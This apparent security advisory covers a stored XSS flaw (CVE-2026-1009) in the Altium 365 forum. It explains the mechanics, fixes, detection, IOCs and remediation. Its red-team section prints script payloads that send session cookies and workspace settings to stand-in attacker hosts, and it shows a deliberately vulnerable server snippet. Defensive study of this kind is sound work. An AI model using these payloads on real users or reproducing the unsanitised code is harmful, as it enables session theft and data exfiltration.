Executive Summary

CVE-2026-1009 is a stored cross-site scripting (XSS) vulnerability in the Altium Forum component of Altium 365. An authenticated attacker can inject arbitrary JavaScript into forum posts, which is stored on the server and executed when any other authenticated user views the malicious post. The vulnerability stems from missing server-side input sanitization in forum post content. Successful exploitation allows the attacker to execute JavaScript in the context of the victim’s authenticated Altium 365 session, leading to unauthorized access to workspace data, including design files and workspace settings. The CVSS score is 9.0 (Critical) due to the high impact on confidentiality, integrity, and availability, though exploitation requires user interaction (viewing the post). No public exploit code or proof-of-concept is available at this time, and no patch has been released by Altium.

  • Availability (A): High – The attacker could potentially disrupt workspace functionality.

Deep Dive & Mechanics

The vulnerability exists in the Altium Forum module, which is part of the Altium 365 platform. When a user creates a forum post, the content is submitted to the server without proper sanitization of HTML or JavaScript. The server stores the raw input in the database. When another user views the post, the server retrieves the stored content and renders it in the browser without escaping or encoding the malicious payload. This allows an attacker to inject arbitrary JavaScript that executes in the context of the victim’s session.

Attack Flow:

  1. Attacker authenticates to Altium 365 and navigates to the Forum.
  2. Attacker creates a new forum post containing a malicious JavaScript payload (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>).
  3. The server stores the post without sanitization.
  4. Victim (another authenticated user) views the forum post.
  5. The victim’s browser executes the injected JavaScript.
  6. The attacker’s payload can then perform actions such as:
    • Stealing session cookies or tokens.
    • Making API calls to exfiltrate workspace data (design files, settings).
    • Modifying workspace configurations.
    • Performing actions on behalf of the victim.

Root Cause: Missing server-side input sanitization. The application does not validate or encode user-supplied content before storing it in the database or rendering it in the browser.

Vulnerable vs. Patched Code

Since no patch is available, the vulnerable code is the current production code. A patched version would include server-side sanitization of HTML/JavaScript before storage.

Vulnerable Code (Conceptual):

// Server-side endpoint to create a forum post
app.post('/forum/post', (req, res) => {
  const postContent = req.body.content; // No sanitization
  db.savePost({ content: postContent });
  res.send('Post created');
});

// Server-side endpoint to render a forum post
app.get('/forum/post/:id', (req, res) => {
  const post = db.getPost(req.params.id);
  res.send(`<div>${post.content}</div>`); // Direct injection
});

Patched Code (Conceptual):

// Use a sanitization library like DOMPurify on the server
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

app.post('/forum/post', (req, res) => {
  const sanitizedContent = DOMPurify.sanitize(req.body.content);
  db.savePost({ content: sanitizedContent });
  res.send('Post created');
});

app.get('/forum/post/:id', (req, res) => {
  const post = db.getPost(req.params.id);
  res.send(`<div>${post.content}</div>`); // Now safe
});

Exploitation & Lab Setup

Red Team (Attacker)

Prerequisites:

  • Valid Altium 365 account with forum posting privileges.
  • Knowledge of the victim’s workspace URL.

Exploitation Steps:

  1. Log in to Altium 365.
  2. Navigate to the Forum section.
  3. Create a new post with the following payload in the content field:
    <script>
      fetch('https://attacker-controlled-server.com/exfil?data=' + encodeURIComponent(document.cookie));
    </script>

  4. Submit the post.
  5. Wait for a victim to view the post. The payload will execute in their browser.

Advanced Payload (Session Hijacking):

<script>
  // Steal session token and exfiltrate workspace data
  fetch('/api/workspace/settings')
    .then(response => response.json())
    .then(data => {
      fetch('https://attacker-controlled-server.com/exfil?data=' + encodeURIComponent(JSON.stringify(data)));
    });
</script>

Blue Team (Defender)

Detection:

  • Monitor for forum posts containing <script> tags or event handlers (e.g., onload, onerror).
  • Use web application firewalls (WAF) to block common XSS patterns.
  • Implement Content Security Policy (CSP) headers to restrict script execution.

Mitigation:

  • Apply server-side input sanitization (e.g., using DOMPurify or OWASP Java HTML Sanitizer).
  • Encode output when rendering user-generated content.
  • Use HTTP-only cookies to prevent JavaScript access to session tokens.
  • Regularly audit forum posts for malicious content.

Lab Setup:

  • Use a local instance of Altium 365 (if available) or a test environment.
  • Create two accounts: attacker and victim.
  • Use browser developer tools to inspect network traffic and cookie values.

Indicators of Compromise (IOCs)

  • Network IOCs:
    • Outbound connections to unknown or suspicious domains from the Altium 365 application.
    • HTTP requests containing document.cookie or fetch to external servers.
  • File IOCs:
    • Forum posts containing <script> tags or JavaScript event handlers.
  • Behavioral IOCs:
    • Unusual API calls from a user account (e.g., accessing workspace settings without prior activity).
    • Multiple failed login attempts from the same IP (if session hijacking is attempted).

Remediation & Mitigation

Immediate Actions:

  1. Disable Forum Posting: Temporarily disable the forum feature in Altium 365 until a patch is applied.
  2. Implement WAF Rules: Deploy web application firewall rules to block common XSS patterns (e.g., <script>, onload=).
  3. Apply CSP: Add a Content Security Policy header that restricts script execution to trusted sources only.

Long-Term Fixes:

  1. Server-Side Sanitization: Use a robust HTML sanitization library (e.g., DOMPurify, OWASP Java HTML Sanitizer) on all user-generated content before storage.
  2. Output Encoding: Encode all user-generated content when rendering in the browser (e.g., using textContent instead of innerHTML).
  3. Regular Security Audits: Conduct code reviews and penetration testing on the forum module.
  4. User Education: Warn users about the risks of clicking on suspicious forum posts.

Patch Status: No official patch from Altium. Monitor Altium’s security advisories for updates.
